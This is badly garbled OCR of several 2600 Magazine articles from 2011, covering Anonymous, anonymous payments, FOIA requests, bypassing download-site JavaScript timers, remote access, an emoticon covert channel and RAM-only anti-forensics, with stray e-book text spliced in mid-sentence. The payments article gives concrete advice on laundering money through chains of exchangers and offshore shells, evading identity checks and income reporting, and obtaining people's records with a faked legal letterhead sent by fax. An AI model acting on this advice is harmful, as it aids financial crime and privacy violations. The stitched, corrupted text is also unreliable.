recount some stories from my past. like a buffer overflow or SQL injection. intimidate you into talking (get a lawyer. This was OK if calling from a phone booth. Scrolling through the hex looking for clear text key value pairs taught me how to manipulate trust to get what I wanted . if it's lulzy enough and spreads chaos. At least learn some sort of network subterfuge layering or wifi. say nothing). What really matters is that in the end the information you needed was acquired. and you can have hundreds of books without the weight. Hundreds of articles are currently up with dozens of different opinions an<f"sources" claiming what is or who exactly is Anonymous..these laws are soon coming to a country near you. I feel hacking is more than just penetrating systems without permission.0'7:::-::~:::::~.. I read that an 800 number call would be traced as a matter of course so that charges could be accurately calculated. It used Lynx and I could give it any URL and surf for free. Perhaps a more "hackish" trick we learned was that a hex editor could be used to cheat at computer games. • If you need to make a reference to something on an e-book. • Once you are done and have no further use for it. A raid is born. you will be sure to have at least a few thousands volunteers to help with the raid. SS. so you spend less and can have more when you want it.to see it before it gets censored. in other words). Random people slightly advanced in throwing together scripts then put these exploits or DDoS tools into an easy-to-use point and click program anybody can run. It is a knife in the heart of corporatism.. They (FBI. The loan time will expire and you will have it back. • You buy e-books on your computer or device ' and you don't have to leave your house or workplace. and that you should get it back. by Anonymous If you had no clue about the tubes running the Internets and scanned recent headlines on Google News. and civilization's death was imminent. you can delete your e-book. Shouts to TABnet. It's delivered right away so you don't have to wait for days and risk not ever getting it because someone.:·:·~?:::":.o. Like 800 numbers. The unthinkable nightmare of virtual legions of no-named people doing whatever they want behind a cloak of anonymity to spread chaos. So who is Anonymous? Is it really a super secret band ofuber hackers who hide on a hidden IRC channel waiting to unleash anarchy? Just a bunch of kids? A "serious movement?" Is that silhouette with the distorted voice in the interview you just saw on CNN really the voice ofAnon? Basically... the adopted bastards network and Max Ray Vision currently languishing in a federal prison camp. a site is down.. and law enforcement can't handle unpredictable citizenry. CNN had a "confirmed Anonymous source" claiming it was a carefully staged social protest against Steve Jobs. MIA) happily give sound bytes to the media. Just be sure you aren't one of those kids who downloaded the LOIC program and ended up with a three year sentence because they were able to track you. I also learned how to be cautious and think about what sort of "trail" I might be leaving with my activities. You can always go back to it when you need to and you don't even have to carry it around. 4chan. hierarchical society." Page 16 2600 Magazine Spring 2011 . basically. but maybe one day you will be able to. and its unlucky participants who end up caught are usually handed enormous prison sentences for merely denying a site a few hours uptime. The next Christmas.. Once they get that plea.. Now try carrying 190 books in your backpack. the community was OK with me sharing it. Hackers succeed by discovering flaws of unverified trust in a system. you can copy and paste." and no clear direction. To illustrate hacking. Anonymous is a banner used by whoever wants to get a laugh by baiting the media. Ifyou find an exploit. This only contributes to the lulz. They go on IRC. etc. but there should be some sort of reward for their activities. messed up. The first personal computer I ever saw was an Apple ][+ at my future best friend Mike's house. this is the worst thing that could ever happen to their ideological vision of world order. You don't have to rewrite. leak some exploit code that's no longer financially feasible or donate their botnets which are near the end of their lives.. There are other possibilities and positive points to e-books. Hackers are not motivated by greed or scams.the game writer "trusted" the players not to modify the game to make it easier. What you can do is have a virtual library that every person in your company has access to for little cost.

. we'll most likely be forced to have cash credits traded on cards that log every transaction. organized religion with lawyers. com and bi tcoin. When that excuse doesn't work they'll find some other reason. Perfect Money. and perpetuated by our governments so they can get an excuse to monitor financial transactions. government. Or you are Julian Assange and don't want your donations stolen. The key here is to receive it to one account. It's not like all our countries aren't filled with the same corporations buying off the same technocrats we call leaders anyways. and other voucherbased systems. a Russian digital currency based in Costa Rica. You trade in gold units. has been around since 2001. They simply provide a site to move the money around. then ask you to enter it as confirmation).. etc. for starters. Singapore. Moneybookers. This is probably the most accepted payment system going. Rejoice! Let's punt some junk on the Internet and be anonymous. The media will claim you enable child pornographers or al-Qaeda. No chargebacks allowed. but it's either a trap. with bank wires. somebody immediately reacts loudly that anonymous currency must only be used for heinous criminal activity like terrorism. they can simply pay an exchanger to fund your account directly. you can buy WMZ (WebMoney in USD) prepaid card codes from buywrnz. Bank on it to survive any crackdowns and protect your identity at all costs. Using the Bitcoin tumbler on Tor. logins. Don't like the JavaScript login? Rent a remote desktop for 5-10 dollars a month or make your own with a cheap VPS. Remember personal Swiss numbered accounts? Long gone. Exchange the LiqPAYinto another digital currency with the many exchangers in Russia.nobody knows who you are if you've used a Virtual Visa or anonymous card for verification (they block the card with a small transaction. not to buy in or cash out directly. or by converting Ukash and Paysafecards they buy at gas stations and comer stores. Exchangezone . but they have turned into the PayPal of Russia.. Use an SMS forwarding gateway or a burner phone (see The Prophet's previous 2600 article on Tracphones) to receive the payments. They've even gotten all those micro-countries in Europe like Jersey. secret police.called intellectual property rights. The Secret Service will be all over you as Mastercard will dispatch them to shut you down. ru to convert it into Liberty Reserve for a low fee. Make an account. and then cash out through somebody else.you can phone them and have them cancel the codes. or rival porn studios run by the mob.How to Accept Payments Anonymously A Digital Currency Guide by Max Vendor https://privacybox. You don't want anybody to know who you are. That person converts it to something else and cashes out anonymously. based in Panama.S. and Western Union will report you for constantly receiving transactions over a certain amount. It's free to receive and move money around. The possibilities are nearly endless. don't even bother. You have hopefully used three or four different countries at this point and the trail is difficult to follow. You can do this for under ten percent. with mailed cash such as nanaimo-gold. which. Basically every country must give up personal data and conform to identification regulations for transactions under the guise of security or protecting copyrights. the media. org forums which list legitimate exchangers. Your road to digital e-currency begins at the talkgold.S. freezing and seizing accounts for whatever reasons. Cayman Islands offshore protection? Same. Adds an extra layer of anonymity. with credit cards. has USD and Euro accounts. Or you could live in a country blacklisted by the western corporate structures of modem financial payment systems such as PayPal. otherwise you shouldn't have any problems with transactions under $200. and the Ukraine. The secret question! answer method no longer works in most countries. people like lawyers. or another e-currency with an ATM card. Accepting Western Union as a direct payment is probably the most foolish way besides Paypal for selling on the Internet. every time this topic is brought up.. You can make as many LR accounts as you want. or have their account held.. corporations. Numerous Bitcoin exchangers such as Liberty Reserve exist who will convert it into cash in the mail. and other wire transfer systems are equally dangerous and prone to held transactions. not Liberty Reserve. who for the past decade or so has been pursuing a policy to extend the global reach oftheir lobbyists' claws to pretty much everywhere on earth. no ID needed). Some exchangers such as AurumXchange . Vietnam. If you can cut and paste some legal website's logo and use an online fax service. Always move money around before withdrawing. This was bound to happen eventually with the growing cancer ofcorporatism. This is created by the media and fictional cop drama television. or the RBN who is going to hold your info ransom after payment to extort more money out of you. you can cash it out directly to any Visa. In what the media likes to refer to as the "post 9/11 world. unless you hire a runner to cash it out. it is now very easy for anybody in the world to buy digital currency and pay you with it. You can register IBCs Page 1 8 . and then email them to somebody. com. Same goes for Ukash. If you live in a former Soviet Bloc/CIS country (or can get a card from there). They have some odd rules. Pecunix. Bitcoin is an encrypted. How can your customers use these systems? Through exchangers who allow in-person cash bank deposits in most major banks (up to $1000 a day. and therefore should be controlled. which they already have . Tell your customers to mail cash to a Bitcoin vendor with your Bitcoin address for direct third party funding. Remember the Unabomber? He lived in a wooden shack without running water or electricity. The best part about Bitcoin is that there are no rules. The days of complicated and expensive bank wire transfers to Latin America just to fund an account with 12 percent fees taken by middlemen along the way are gone. With a phone and a credit card. How can you be your own exchanger? Ifyou're in the U. so eventually almost all of the world's governments have caved to these reporting requirements. WebMoney. Terrorists use a cash honor-based system that has been around since the eighth century called Hawala (which is actually a pretty awesome idea when you read up on it). Transfer systems such as PayPal in some situations can have your linked bank accounts frozen. or demand further verification. Your customers don't even need Liberty Reserve accounts. The MPAA probably has a button they push that freezes accounts upon request. truly anonymous currency.msg You wish to sell something. iKobo. The only currency more anonymous than this is Pecunix and Bitcoin. you can probably get anybody's info. Anelik. :'Sadly. However. if you think is high. based in the Seychelles and Malaysia. Here's a breakdown of some of what's currently available and easy to use: LiqPAY (Liquid Payments Inc. Tell them criminal gangs use stolen cards. What is not anonymous? Well. Even they caved.." we are all at the mercy of the U. and easily move money around. but otherwise it's an excellent system if you don't mind paying the typical 6-10 percent exchanger fees. It is the future of money. The 9/11 guys didn't need a bunch of money to buy box cutters and one way tickets. In 20 years. com is a good place to find other people willing to do this at 1:1 cost. you don't even need money to be a terrorist. Sure. it is completely impossible to figure out who paid you money from where. corn and other exchangers with a credit card. anybody can send you up to $200 per transaction and the payment can't be charged back. Be warned: sometimes LiqPAY seizes accounts if they are suspected of selling Ukash vouchers or other digital currency.though not for long. Paysafecards.. or perhaps your competition is completely evil and will come after you for infringing upon their monopoly. is entirely based on gold reserves. register an IBC in the Seychelles or Belize to open up bank accounts to accept customer wires. there may be sites appearing to sell this stuff saying you can buy their illegal porn. Do not believe the myth that there is some sort ofglobal child porn profitable empire in 2011. Maybe you don't want to be at risk to rampant civil litigation or exposed to fraudulent buyers. whose only income was probably offering a tax haven. with Western Union. based out of the Ukraine. Instead of buying fake ID and scans from vendors on shady carding forums and exposing yourself to Secret Service or Interpol honeypot traps. Whatever the reasons. one of the original e-gold currencies based out of Costa Rica. You can even exchange Skype vouchers into Liberty Reserve now. Noncompliance means sanctions. decentralized. and use different exchangers to keep anonymity.. there are in fact methods to conceal your identity and still sell something without undesirable people knowing who you are. This is also a great currency to fund your Liberty Reserve account with.. and a variety ofother strong arm tactics. Yet they probably use cash every day which is (omg) anonymous .delmaxvendor. cashU. Child porn traders and other morally repugnant vendors at the shallow end of the human gene pool do not actually sell anything. Chargebacks are also possible . think of all the merchant fees charged for accepting Visa/MC or money lost to chargebacks. The harassment potentials have no bounds. fund it (free). Besides. Instead. It's up to the exchanger to verify buyers.). Before I begin. Some clown who purchased Liberty Reserve through you will try to sue you in Florida for enabling his gambling addiction. based in Panama and supposedly Zurich allows third party wires directly to your account or free account funding via bank wire.. Liberty Reserve. C-Gold. com allow you to withdraw directly to an ATM card. MoneyPak. convert it to another currency.- 2600 Magazine Spring 2011 Page 19 . this used to be a good anonymous currency. and they give away your info to practically anybody who faxes them a legal letterhead. and professional laundering services like ePharma merchant account resellers to cash out with layers of shell companies and casinos. They offer excellent anonymous protection if you move payments to a different account to cash out. They also get their money by skimming cash from all that so-called rebuilding money floating around Afghanistan and Iraq. You don't even need a WebMoney account. then use exchangers like superchange . No JavaScript. Cash out . Visa/MC. and they allow private transactions to hide your details when transferring to another account. There are online lawyers everywhere now who do this for only $50.

.. Now that your letter is written.Money" and Bitcoin are now the chosen currencies for best anonymous s First off. I recommend $25. current address. maintenance. your full name. But.S.. it's downright dangerous to pay your taxes. and a fee you are willing to pay for this service. com blog about it).. Suite 6248 Ft. If you were ever in the military. These are just a few of the organizations you can contact about records. It is not.S. However. Once the organized mob calling itself the Moscow City Council finds out you have money.S. Ifyou've never robbed a bank or tried to kill a President.. and dissemination of personally identifiable information about individuals that is maintained in systems of records by federal agencies. you can use something like Shamir's Secret Sharing to split the key up into two drives that both need to be accessed in order for it to work. not the branch offices. and currently their authorized site to apply to be an exchanger. In Moscow.it would be safer to do manual transactions to prevent getting robbed (which has happened . why not send a letter to all of them? Remember. It's like the one where if you buy a copy of 2600. I am only giving the address to the main FBI location.. the ever-present "they" start tracking you. 20530-0001 Defense Intelligence Agency Defense Intelligence Agency ATTN: DAN-1A (FOIA) 200 MacDill Blvd Washington. below are the addresses of the various governmental agencies you may want to try contacting.. This is actually a pretty easy endeavor.C. The Secret Service's FOIA page states that you need to sign your letter and have a notary witness it or affix the following to your letter: "I declare under penalty of perjury that the foregoing is true and correct. The second Act is the Privacy Act of 1974. and a domain that isn't registered by any U. you aren't using the debit card it comes with. but note that you do not have to send this money in unless they ask for it. company to prevent it being yanked. VA 22602-4843 National Security Agency National Security Agency Attn: FOIAIPA Office (DJP4) 9800 Savage Road.. You will probably also require DDoS-proof hosting (or Tor). I'm starting to wonder what happens when you write for 2600. In order to obtain any documents about yourself. but people call you Bill.foia. as would any screen name or "hacker name" you use or have used). com is the largest wholesaler of Liberty Reserve. When controlling large amounts of digital currency. you should use something like The Amnesic/Incognito Live System to log into your own private desktop that you preferably set up yourself (or VPN). wherever if you would not like to report your income due to various reasons. You may want to check the FBI's website to find out the nearest branch office to you and appeal to them as well. if you know that you have done something that could get you arrested if they knew where you are. D. use. If you would like a refresher course on how to write a letter. asp.. which was signed into law by President Johnson in 1966. there is a slew of resources online available to help you figure out where to send your inquiry as to your military records. or your great-grandfather's who you believe worked for Al Capone. this article assumes that you are a dude or dudette living in the United States who wants to know what the U. it means they must have quite a bit of files to send you. though they did inform me that more information is available at a price. there is the Freedom of Information Act (FOIA). MD 20755-6248 Central Intelligence Agency (CIA) Information and Privacy Coordinator Central Intelligence Agency Washington.C. Page 20 2600 Magazine Spring 2011 . DHS. the price of a stamp is currently 44 cents. Drug Enforcement Agency (DEA) Freedom ofInformation Operations Unit (SARO) Drug Enforcement Administration 700 Army Navy Drive Arlington.read the trainexservice. National Central Bureau Department ofJustice Washington. George G. com or talkgold.. In your letter to each organization. etc. an explanation that you are invoking both FOIA and the Privacy Act.. VA 22202 Secret Service Communications Center (FOIIPA) 245 Murray Lane Building T-5 Washington. Just be careful with enabling the Liberty Reserve API . "HD.C.. this would fit.C. Make TrueCrvot containers on those drives and keen your accounts' passwords on them. whoever receives your letter will have an easier time reading it and figuring out what you want. However.gov/sample_request "_letter. the FBI.. even if you haven't. then ~e "proper letter writing format" into your search engine of choice. you have to invoke both Acts in a letter to each organization you wish to contact about your records. Now. Since it's so easy to write one letter and change it slightly for each organization. Or be an independent anonymous exchanger. Fund a third party card and use that so they can't trace back to your bank in Cyprus. I have requested files from FOIA from several government organizations and none of them have ever charged me for the files they sent.. Writer update: Liberty Reserve is now actually dangerous to use. Latvia. Department ofHomeland Security 245 Murray Drive SW STOP-0655 Washington. Make sure if withdrawing from your offshore business account.P a g e 21 . D. The Privacy Act also prohibits the disclosure of information from a system of records without the written consent of the subject individual. this is not a primer on how to get your brother's records. social security number.. and if they do ask for it. It is a law that promotes openness in government and allows members of the public to request documents from the various governmental entities. In some countries.. CIA. it's best if your government doesn't even know you exist.. government knows about you. Executed on [date]. it would help to follow proper letter writing protocols. it should contain the following information: the fact that you are seeking any records that organization has about you. phone number.s.for only $900 through various company formation sites. First. It involves snail mail and is guaranteed to take at least three months to receive any results. If really paranoid. combined with an encrypted USB drive from the German Privacy Foundation or IronKey. the CIA has a great sample FOIA/PA letter online at www. The scope of this article does not include teaching you how to write a letter. 20505 INTERPOL (USNCB) Office ofthe General Counsel INTERPOL-U. 20528-0655 Federal Bureau of Investigation (FBI) Federal Bureau ofInvestigation Attn: FOIIPA Request Record/Information Dissemination Section 170 Marcel Drive Winchester. quick. DC 20340-5100 Odds are that you should only try contacting agencies you believe would have information on you. NSA. date of birth. 20223 Department of Homeland Security (DHS) FOIAIPA The Privacy Office u. or your mother's. Also. D. however. that you are ready to write your letter.. First. There's also that rumor that if you ask the FBI to send you a copy of your file and they find you don't have one. they start one on you right then must be having a file on you. why not send them a letter anyway? You never know what you'll find.. they just come to extort as much more as possible. There are two Acts at work here. That way. you might not want to bother the Secret Service. Why you want to know what the government knows about you is your own business. due to Costa Rican banking laws recently changing. where you were born. any alias you may have used (ifyour name is William. e-cardone. Meade. D. This Act governs the collection. com first to make sure they are legit. you might not want to proceed.." You should also include a copy of your driver's license or other identification so that they can compare your actual identification to the information you have provided (and your signature on your license to the signature on your letter). who do you think has a file on you? I'm talking about those (typically) three-letter-organizations. Check them on safeorscam.cia.

This is really a JavaScript bypass. There are. Not being a member of this web service. The longest part of this process is finding the JavaScript for the timers the . some of us got by with Universal Plug and Play (upnP) but. Opera has a built-in function where you can view the source code in a tab and then reload the web page with new code inserted. c=c-1. source code ofweb pages. After a little poking around I found what will be referred to as "Interesting Bit of JavaScript": "Function fc() { if(c>O){ document.. Please notice -that only Premium Users will -get full download speed.remaining</h3> That "c" right there is an important piece for us because it is displaying the "seconds remaining" on the actual web page. Only you will be held responsible for the actions that occur from this information. bypassing little JavaScript timers is all well and good. 1000).onload = fc. It all starts with the little steps. I clicked the link and was soon staring at a Rapidshare page. Another way to mess with the timer is to tinker around with JavaScript timing events. we would RDP/ VNC into our desktops when we needed access. so not only are you protected from exposure.first couple of times. and expose ourselves to the blistering cold world. setTimeout("fc()". but a hacker would need the password to your LogMeln account and the password to your local machine account (assuming the attack Page 22 2600 Magazine Spring 2011 Page 23 . Basically when the milliseconds run out. What's the catch? The free version gives you full access to the machine except you can't transfer files. no switch to hit.milliseconds). after about 15 seconds I grew tired of having to wait. Then we'd have to port forward.com The free version ofDropBox allows you to have two gigs of cloud storage. you've got about five computers (Work.). Sometimes you just need to login to check how your Torrents are going. 46 until it finally hits zero and tells the code to execute the "if' statement.. to set the scene: It's another night in front of the computer and I'm scouring the Internet to try and find a couple of good PDFs to put in my new e-book reader and just found a collection of programming books. Rather than paying LogMeIn's monthly fee that I can't seem to justify for my personal needs. Not too sure if I really need this but: This information is for educational purposes only. but how does this make me a better hacker?" Well. We've even touched upon concatenation. Both of these applications have free Android implementations which means I can manage any of my computers from anywhere. So what if we change "1000" to "1"? Well. If not. window.. ''var c = 50" tells us that the variable "c" will be set for 50. others but I found the most luck on these sites." id=" -zeit"> ' + c + ' seconds . Ifyou didn t know much about JavaScript. Home. and name them as you see fit. this is a great way to move files to your friend's computer or even your Android phone without any cables. you copy the file to your DropBox folder on your remote machine..' most hackers Iearn IS messmg aroun d i the HTML m . Everyone at my work is always having trouble connecting to their machines because the VPN or the Terminal Services are not working. 47. (Just wanted to cover my bases. And there you have it! Full remote access with all free software. In about 89 seconds the books would be mine..location.. getElementByld("dl") . } else { . it wasn't as easy breezy beautiful as we had hoped it would be. some cheeky websites like to deposit files which use a little piece of code called "Show_ urlt)". in the long long ago. . we simply need an easy way to transfer our files! Today's Easy Way (With Free Software) There are two applications that I use to keep my remote access simple. As W3Schools. From a security perspective.*Nothing to really see here. even when it's behind a NAT router.yy little tncks around other web pages. and I've never had a single problem logging into my office machine."#dlt") c = 0. it will execute the statement "fct)".. Don't worry about finding a JavaScript timer. but at a fraction of the time it would have normally taken. 1000).innerHTML . by no means a strictly Rapidshare bypass. the loop will still go. Here we have a piece of code showing the seconds remaining: <h3 style="font-size:24pt. As long as you keep moving forward.." Hmm. let's face it. of course. So. The syntax for JavaScript timing events is: setTimeout("JavaScript statement" -. window. Sure..remaining</h3> .'You are not a Premium User and -have to wait. We look at the following line of the "Interesting Bit of JavaScript" we saw earlier and find: c=c-1.. . however. If you're ever making a purchasing decision for a company. There was no bit to flip. So you may be thinking. LogMeln machines are accessed by the main LogMeln server.hash . you now know about messing around with variables. I've given up on using their ways for a while now.. try to throw a bone these guys' way.hash . all the way up to this point. like most of us were. OK. This piece of code tells "c" to wait 1000 milliseconds.) In this article I will be using Rapidshare as my example. This variable is run through a loop with some of the code above. or just to grab a file you might have been working on. var c=50..and JavaScript timing events. Ofcourse. Home Laptop. com will tell you "JavaScript is the scripting language of the web. This is. <h3 -style="font-size:24pt." taking a variable and placing it next to a predetermined string of characters. in a way that you can even organize them into batches. and even that is free.:BYPASS IIlG JR'JRS[R IPT TIMERS DR IDJ I LERRIlEB TD STOP WR I TIf1G RflB LD'JE THE 'JAR I R1JLE by K3ntucky This tutorial is about bypassing the timers on a couple of the-bigger downloading sites (mainly Rapidshare. I had to click the free link. .location. and those passwords had better differ *waves finger*). They've got some pretty neat sharing features to mess with. and sometimes we didn't even have permission or physical access to the router at all! Exempli gratia workplace hardware. Though I do have the password to the router (muahaha) I've never had to port forward anything. and happily receive the file in one piece on your local machine. Work Laptop."#dlt") c = 0. and Deposit Files. be it 10 seconds or zero seconds. A few lines down we find: var c=50. you'll be a better hacker in no time! //////H/////////H#/H//#///////////Q//HH///HH/////H/#/H///H/////////////H//#///###/H//##H////////#/H/H//H//H/////H/H/////H//////////M'/#// Remote Login Made Easy by GantMan If you're like me. But what happens if we change "c" to zero to begin with? The zero is sent as normal and the link appears as if you waited. Here it's used to place what "c" represents next to the words "seconds remaining. scnpts and a grease monkey scnpt to automate this process. and vice versa.com The free version of LogMeln will allow you to access your computer from a web page. because that's why we're getting these services for free in the first place! Application 1: LogMeIn. setTimeout("fc()". That is. I'm sure LogMeIn is pretty happy with all I've had to say about their product. However. for the beginners out there one of the first things .. Of course. This comes in really handy when you want to mess around with web pages." id= -"zeit"> ' + c + ' seconds . Ho efull ou will take this article and find other . is informational. "Well." Quick note: I'm using the latest version of Opera for this. It also presents you a list of all your computers you have access to. if (window. Great! Now I can use that extra 50 seconds of my life to do something more productive. I'll point out a few things." Now we just need to find the part of the code that uses "c" as a variable. Most of the websites I've seen have some type of function that follows this. but those really only work for certain websites. Constantly I hear people bicker about their inability to perform remote duties. _ if (window. Simple little piece of code if you know JavaScript or have a good grasp of basic programming.. if the site uses JavaScript for their timer. Application 2: Dropbox. Simply put. before continuing. unless we were behind a NAT (Network Address Translation). You install DropBox on a computer and it's like a share drive. As an added bonus. p . then you can use this information. Megaupload. Way back. which is one second for those not in the know. and that the passwords differ.onload = fc. My hacking sense started to tingle and I opened the source code page. or hide behind a nice VPN (Virtual Private Network) which most of us either never understood how to set up or didn't have the hardware necessary to set up. Mediacenter). there are some . This makes the .whole p~ocess much easier as all you have to do IS find this guy and replace whatever is in the brackets to whatever time you want to wait. This is known as "concatenation. The line "c=c-l" makes "c" tum in to 49 then 48. . just code to be executed when certain conditions are met.

. therefore a third party listener would have no idea that a secret message was being transmined. I'm going to make an assumption that you have Linux installed on your hard drive and some form of software to play virtual machines. We are now going to hypothetically paint a picture that you just can't seem to get a Jonas Brothers' song out of your head . [2] We could also rename and overwrite the BackTrack . A few items in this system require further work to increase and secure communication including checksums and multiple emoticon handling to make this channel truly lossless .. along with Linux . As a result. Much like the Iproc directory. with emoti eons' popularity that have essentially now become a part of the alphabet and are indispensable. most us have a secret. . therefore its use is extremely plausible.• \JOi ~ ~ ~. for simplicity's sake. even as root /dev/shm looks like irs a normal directory. All you want is to hear that gu itar solo before work. Additionally. It has constantly been one of the top three instan t messenger application over the last ten years. Number 3. and choose to boot from an ISO file instead of the current OS on the virtual disk . An effective coven channel requires three indispensable properties : plausibility. MSN Messenger emoticoos are useful for coven channel communication because they satisfy all three properties. ~ . which sends both the overt message and the co ven one and a receiver (Bob) which writes the results to a text file. Users tend to pepper each line of text with several emoticons during an average conversation.!1 ~ ~ ~ t1 = .Iso file of the ever popular BackTrack into it Any live distro should work here. What 's worse is that your roommate is a nosy forensics expert who is always searching your drive when you are away at work. happy class and sad class. select CDIDVD. The channel can be represented as such: Bits Transmitted 00 01 10 Happy Class :) Sad Class : '( :( :d . . Eight different ernoticons were chosen and were separated into two classes. Worse yet.com/ -download . if the " :)" is transmitted successfully.). With that being said. but one we would rather bury dead babies than talk about. he's getting smarter. only one emoticon can be sent witb each line of text. they also present an opportunity for covert channel communication. (It's a stretch.. . choose to overwrite the file. this system allows an unlimited amount of emoticons to be used in one line of text. The advantage of this system over other methods of covert communication is that it is extremely plausible and undetectable.. including AOL messenger. Now we need to copy a virtual machine already on our disk to this directory.net. and we can call the directory we made anything we want. In order to send messages over the covert channel.lfhe can pull this off. You secretly like one gu itar solo but would just die if anyone found out. . this binary representation is transmitted over the MSN network via the above emoticons along with the overt message.Net messenger library. the author. Once eight bits have been transmitted. If we were using VMWare Workstation. The information rate of this channel depends on the amount of emoticons that the user uses . We change this to the location of our Back'Irack ISO in Idev/shrn and load it up./ Spring 2011 Page2S . For example. It 's almost time for work. We stan up Firefox and finally listen to that song on YouTube. though! After we log out of Back'Irack. these techniques may work there as well. @ e@Q~ 0~ o~e.ISO with another ISO if we felt the need. ••• # c d / dev /s hm " mkdir mine it c d mine # wget http : / /www. and indispensability.b ack trac k. Another possibility could be to overwrite the "mine" folder we created with another containing pictures or something else . 8i • • ®Qe ' IiIi ' ·~iIiI· i " '·~. The covert message is typed in the auxiliary window of the sende r. due to the fact that Mac OSX .j l ] I know what some of you are thinking: " Wait! When RAM is full. MSN is used all over the world for co mmu nication in the workplace as well as in the home .cyberciti.html [2J 2600 Volume 25. Overwriting the file would help force the data in that memory location to be cbanged. is being forged from the flames of UNIX . two bits of the covert message block is transmitted per line of text. The important part is that we download with wget from the /dev/shrn/mine directory so it is Doldownloaded to disk. ~ A~ by Armando Pantoja As popular as emoricons are today for conveying emotion. and this converts the ASCII text into binary. my hat is off to him. Not only can he search your drive.' ~ • ~ " ee ._ .~ a Q8~~~O ~~~.- '. The emoticons were chosen by the particular emotion they were trying to convey and needed to closely match the other emotions in its respective class. 0-' ~S~~U152 flul/)~9 " ~ 6?8l/)aSe2i by Israel No matter who we are. the recipient converts the binary back to ASCII and write s the result to a file. we copy tbe original instance of the XP machine folder to I dev/slunlmine again. I'm also sure the following is different. the recipient will read this as a " I". If we assume that the user uses emoticons in every line of text and sends an average of 12 to 16 messages per minute. The low bit rate is adequate for sending very short messages and encryption keys . The only difference is that we can't create directories in Iproc. the throughput of this channel is two to four bits per minute. Bit by bit.biz/tips/what.. only endorse the use of this article for legal usage. the user then clicks the button "stan transmission". the RAM still holds tons of traces of your every step until it is eventually overwritten.. Even though the disk was never touched. th is will also be paged into SWAP which is on disk! ~ We'll get [I] www. In principle. increasing tbe rate of transmission exponentially. were chosen to be shifted by the system. For now we'll just stick with Linux . Now our stalker roommate will have the challenge of searching for our secret inside the overwritten RAM of a virtual machine that is spread across overwritten locations of RAM and swap. ~. all '" . Th is low throughput is acceptable given tbe strong covertness of the channel. There is a sender (Alice).@o · This system was implemented on top of the DotMSN Open Source . The I dev/shm directory might be 8 little new to you . but nothing here is saved to disk. iso Most of this should be self explanatory. undetectability. page 51 Page24 2600 Magazine . Now we are going to be running BackTrack from the virtual RAM of the virtual machine. When asked. just go with me for a minute). we could easily go into the mach ine's settings under the hardware tab. I..) :1 :-1 II :p ~ ~ . this system is very undetectable. (. he can search your RAM! We could use a live Linux distro. The purpose of this is to help secrets remain secret! First of all. but possible on Windoze.~~. Wendy would have no idea that this was happening because sbe would have no idea what emoticon the sender chose to send because similar emoticons. A covert channel is a commun icat ions channel which allows information to be transferred in a way that was not intended by the creators of the system. it could still be easily recovered. Thi s system is not limited to just MSN messenger. but could be used on any instant messaging system where emoticons are used. the other recipient will read this as a "0". This system tried to avoid detection by an independent observer (Wendy) by encoding the message in a series of ernoticons. But for now. if the user types in ":)".i s -devshm-and-its-practical-usage .) ( . For now just know that we made 8 directory there called " mine" then downloaded and moved an . this is 8 virtual file system. The objective of this system is to covertly send data from one clien t to a host. For now we will just pretend that the virtual machine we copied from disk has Windoze XP installed on it Just go ahead and copy the whole folder the VM is in to Idevl sbrnlmine. we open our command line in Linux and take a few steps: to that later. and. no one knows my secret. This channel would be perfect for transmitting a key of an encrypted file via MSN undetected. . We do our dirty work from inside here . but he would never let you live down a secret obsession with the JOIlJlS Brothers. created by Xih Solutions. Who would? First. I hold no responsibility if this article is used otherwise. Except you .'£"'_ * . and even cell phone SMS . if it is shifted. but that's no good against a cold boot attack. Not just any secret. and was written in VB . Yahoo Messenger. conveying similar emotions.~ 0 ~~m. This is very important because if we merely deleted this virtual machine.

I was so unaware of what I could do thanks to a phone line and a modem . but that they won't be able to log on if it isn't their set time. and won't. all I can say is: When you find a barrier. more often than nor. I turned to online gaming. "What is a hacker?" it seems to me it's anyone who can take what'S out there and use it. And as for advice. I even fixed my waw. I looked it up online and did thai with my own car.. or the local cable company. mostly because the lasl time I did. I loved finding something new to try or to read about. and using services Like PIP and pop and SMTP all kept my interest. I can't complain though. and. including Buffy. of course. I'rn not embarrassed 10 say that my firststop was 3 chat room. I haven't exactly told them thai I can take over their sessions and find om where they went and what they typed. share ir. Katherine Cook currently resides In Fort Wayne. manipulating graphics. I had my own computer (Dad's old IBM compatible) for research papers and data storage. but help them save a jew dollars a.This.wheo someone says the word "hacker. at the time . I helped 10 set up and explain new applications they needed for work. and my husband at the time couldn't afford 10 miss work. And so. beginning with some coding. I quickly caught on regarding how 10 operate the more complicated online applications and became familiar with the ability to searcb for information and utilize: it in some fairly strange but oftentimes useful ways. In no time at all. I'm not really sure bow much a professional charges for that. not the most legitimate way to watch a show. which is kind enough to carry several great shows for our free viewing pleasure... I \lias asked to help out with scripting for channels. Now I change parts with the ease of a mechanic with spark plugs. my youngest and third child entered the school system. Then came mycult TV side and the discovery of warez. viruses and rnalware. meant thai any scripts thaI were available for mIRC had remotes and pop-ups thai had been designed for the men.. As a kid. I was around ten (in the mid 1980s) when I first remember doing this with a simple graphics program thaI could make posters and cards and such. 1 have a vague memory of wishing there were computer classes.. This was way before hulu. As the years went by and my 30th birthday rolled around. one of the few things all the females in my immediate family had in common al the time. There was no Internet for me. it being 1990 and having a thrifty. patch it. My parents have been incredibly supportive of my education and dreams.. Instead. Great for them. I think that had I been born just a few years later. J honestly couldn't think of anything else al the lime. but quickly lost interest with the internal politics that SO often come into account with large groups of people who all think they should have the last word. but I figure the Internet service paid for itself that year just by allowing me 10 access the steps I needed 10 take in order to gel hot water running in my borne again.ebsite as a local correspondent on pastimes is " cyber safety for pareras . I fixed the furnace. I began teaching myself how to fu the machine I was using more and more. a Star Trek chat room. But it will be pretty cool if one of them tries to break through my restrictions SOUICday. Either that or the more devious rich unnamed evil genius living in a high class loft with cameras spying on the front door while he breaks down security measures and steals loads of cash from businesses. for me il was. When you hear a stereotype. or building ones that were activated by certain actions. I was hopping through networks on mIRC. Dad was an accountant and Mom was a teacher.heater when the catalyst burned out. J would have loved entering an IT field or anything having to do with technology. My kids teU everyone that their geeky mom can fix a computer. see if you can push it.com. I couldn't afford the mechanic. and became familiar with patches and hacks into game servers. my life took a different path. After a year. Getting a taste of running a computer and being responsible for its upkeep while discovering all of the new things I could do with it was like finally being able to read an entire book that I'd only been able 10 view the cover of before.. What I did have was a secret passion for sci-fl. Too often . and the phrase "overrated typewriter" being used. And when you lind a great hack. Simple things likechanging WOrds in pop-ups from "he" to "she" or simply making a few things more gender neutral. (t seemed that the population of cyberspace was an easy 10:1 in favor of those \IIith chest hair. no college at all. And I was finally beginning to understand what my true passion was. As Tgrew up. A few months later. bil by bit. Married and a young mother of two. plus they get free PC repair on call from a highly reliable 